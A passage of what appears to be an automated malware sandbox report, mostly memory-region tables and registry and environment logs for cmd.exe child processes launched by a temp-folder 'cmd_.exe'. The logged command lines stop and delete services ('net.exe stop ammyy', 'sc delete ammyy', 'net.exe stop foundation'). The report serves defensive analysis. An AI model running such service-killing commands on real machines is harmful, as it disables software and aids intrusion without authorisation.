pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x00160fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x00000000001a0000 0x001a0000 0x0029ffff Private Memory Readable, Writable True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000440000 0x00440000 0x005c7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000005d0000 0x005d0000 0x00750fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000760000 0x00760000 0x01b5ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001b60000 0x01b60000 0x01f52fff Pagefile Backed Memory Readable True False False -
private_0x0000000001f60000 0x01f60000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x00000000020b0000 0x020b0000 0x0212ffff Private Memory Readable, Writable True False False -
private_0x0000000002140000 0x02140000 0x021bffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x00000000022d0000 0x022d0000 0x0234ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02350000 0x0261efff Memory Mapped File Readable False False False -
private_0x0000000002630000 0x02630000 0x026affff Private Memory Readable, Writable True False False -
private_0x0000000002780000 0x02780000 0x027fffff Private Memory Readable, Writable True False False -
private_0x0000000002870000 0x02870000 0x028effff Private Memory Readable, Writable True False False -
pagefile_0x00000000028f0000 0x028f0000 0x029cefff Pagefile Backed Memory Readable True False False -
private_0x00000000029e0000 0x029e0000 0x02a5ffff Private Memory Readable, Writable True False False -
user32.dll 0x771d0000 0x772c9fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x772d0000 0x773eefff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
taskeng.exe 0xfffb0000 0x100023fff Memory Mapped File Readable, Writable, Executable False False False -
tschannel.dll 0x7fefa630000 0x7fefa638fff Memory Mapped File Readable, Writable, Executable False False False -
ktmw32.dll 0x7fefaa20000 0x7fefaa29fff Memory Mapped File Readable, Writable, Executable False False False -
xmllite.dll 0x7fefb730000 0x7fefb764fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7fefb770000 0x7fefb787fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7fefbb50000 0x7fefbba5fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7fefc930000 0x7fefc976fff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7fefcc30000 0x7fefcc46fff Memory Mapped File Readable, Writable, Executable False False False -
wevtapi.dll 0x7fefce60000 0x7fefceccfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7fefd200000 0x7fefd224fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7fefd230000 0x7fefd23efff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x7fefd320000 0x7fefd333fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7fefd430000 0x7fefd49afff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7fefd710000 0x7fefd912fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7fefd970000 0x7fefd98efff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x7fefdd90000 0x7fefdd9dfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7fefdda0000 0x7fefde76fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7fefde80000 0x7fefdf1efff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7fefdf20000 0x7fefe028fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7fefe030000 0x7fefe05dfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7fefe060000 0x7fefe0c6fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7fefe0d0000 0x7fefe1fcfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7fefe2a0000 0x7fefe37afff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x7fefe4c0000 0x7fefe588fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7fefe590000 0x7fefe628fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7fefe8f0000 0x7fefe960fff Memory Mapped File Readable, Writable, Executable False False False -
apisetschema.dll 0x7feff710000 0x7feff710fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd4fff Private Memory Readable, Writable True False False -
private_0x000007fffffd5000 0x7fffffd5000 0x7fffffd5fff Private Memory Readable, Writable True False False -
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True False False -
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd9fff Private Memory Readable, Writable True False False -
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True False False -
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory Readable, Writable True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False -
Process #10: cmd.exe
56 0
Information Value
ID #10
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C net.exe stop ammyy
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:13, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:25
OS Process Information
Information Value
PID 0xb84
Parent PID 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 404
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x0054ffff Private Memory Readable, Writable True False False -
private_0x00000000006d0000 0x006d0000 0x007cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000007d0000 0x007d0000 0x00957fff Pagefile Backed Memory Readable True False False -
private_0x0000000000990000 0x00990000 0x0099ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000009a0000 0x009a0000 0x00b20fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b30000 0x00b30000 0x01f2ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001f30000 0x01f30000 0x02272fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02280000 0x0254efff Memory Mapped File Readable False False False -
cmd.exe 0x4abe0000 0x4ac2bfff Memory Mapped File Readable, Writable, Executable True False False -
winbrand.dll 0x74bc0000 0x74bc6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75300000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75d10000 0x75e0ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75e10000 0x75e9ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x75ea0000 0x75f3cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x760a0000 0x760a9fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76dc0000 0x76e1ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (11)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\qj4SUKboE\Desktop type = file_attributes True 2
Get Info net.exe type = file_attributes False 1
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\net.exe os_pid = 0x8d8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4abe0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75440000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x7546a84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75473b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75454a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7546a79d True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:12 (UTC) True 1
Get Time type = Ticks, time = 10926200 True 1
Environment (17)
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT, result_out = $P$G True 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = =C:, value = C:\Users\qj4SUKboE\Desktop True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000002 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #11: cmd.exe
55 0
Information Value
ID #11
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C sc delete ammyy
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:13, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:25
OS Process Information
Information Value
PID 0xb7c
Parent PID 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B8C
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000120000 0x00120000 0x0021ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000220000 0x00220000 0x00221fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000230000 0x00230000 0x00230fff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x00240fff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0030ffff Private Memory Readable, Writable True False False -
private_0x0000000000380000 0x00380000 0x0047ffff Private Memory Readable, Writable True False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000510000 0x00510000 0x00697fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000006a0000 0x006a0000 0x00820fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000830000 0x00830000 0x01c2ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001c30000 0x01c30000 0x01f72fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01f80000 0x0224efff Memory Mapped File Readable False False False -
cmd.exe 0x4abe0000 0x4ac2bfff Memory Mapped File Readable, Writable, Executable True False False -
winbrand.dll 0x74bc0000 0x74bc6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75300000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75d10000 0x75e0ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75e10000 0x75e9ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x75ea0000 0x75f3cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x760a0000 0x760a9fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76dc0000 0x76e1ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\qj4SUKboE\Desktop type = file_attributes True 2
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\sc.exe os_pid = 0xb64, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4abe0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75440000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x7546a84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75473b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75454a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7546a79d True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:12 (UTC) True 1
Get Time type = Ticks, time = 10926528 True 1
Environment (17)
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT, result_out = $P$G True 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = =C:, value = C:\Users\qj4SUKboE\Desktop True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000424 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #12: cmd.exe
56 0
Information Value
ID #12
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C net.exe stop foundation
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:13, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:25
OS Process Information
Information Value
PID 0xbac
Parent PID 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 948
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0025ffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x0035ffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x0000000000580000 0x00580000 0x0058ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000590000 0x00590000 0x00717fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000720000 0x00720000 0x008a0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008b0000 0x008b0000 0x01caffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001cb0000 0x01cb0000 0x01ff2fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02000000 0x022cefff Memory Mapped File Readable False False False -
cmd.exe 0x4abe0000 0x4ac2bfff Memory Mapped File Readable, Writable, Executable True False False -
winbrand.dll 0x74bc0000 0x74bc6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75300000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
